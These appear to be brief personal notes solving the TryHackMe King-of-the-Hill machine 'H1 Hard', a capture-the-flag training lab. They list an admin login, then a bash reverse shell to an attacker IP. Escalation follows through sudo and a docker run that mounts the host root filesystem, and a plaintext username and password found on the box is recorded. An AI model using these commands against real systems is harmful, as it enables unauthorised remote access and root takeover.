H1 Hard

TryHackMe KoTH Machine - H1 Hard

TryHackMe | Cyber Security TrainingTryHackMe

---

login on port 80 via creds of admin user

/bin/bash -c 'bash -i >& /dev/tcp/10.8.91.66/8888 0>&1'

ssh admin@127.0.0.1 -t "bash --noprofile"

cd /usr/bin

export PATH="/usr/bin"

sudo -u root /bin/bash

docker run -it --name zboub -v /:/tmp/zboub ubuntu:20.04 /bin/bash

We found davelarkin user pass on port 8888 /users dir:

http://10.10.229.151:8888/users

davelarkin "totallysecurehuh"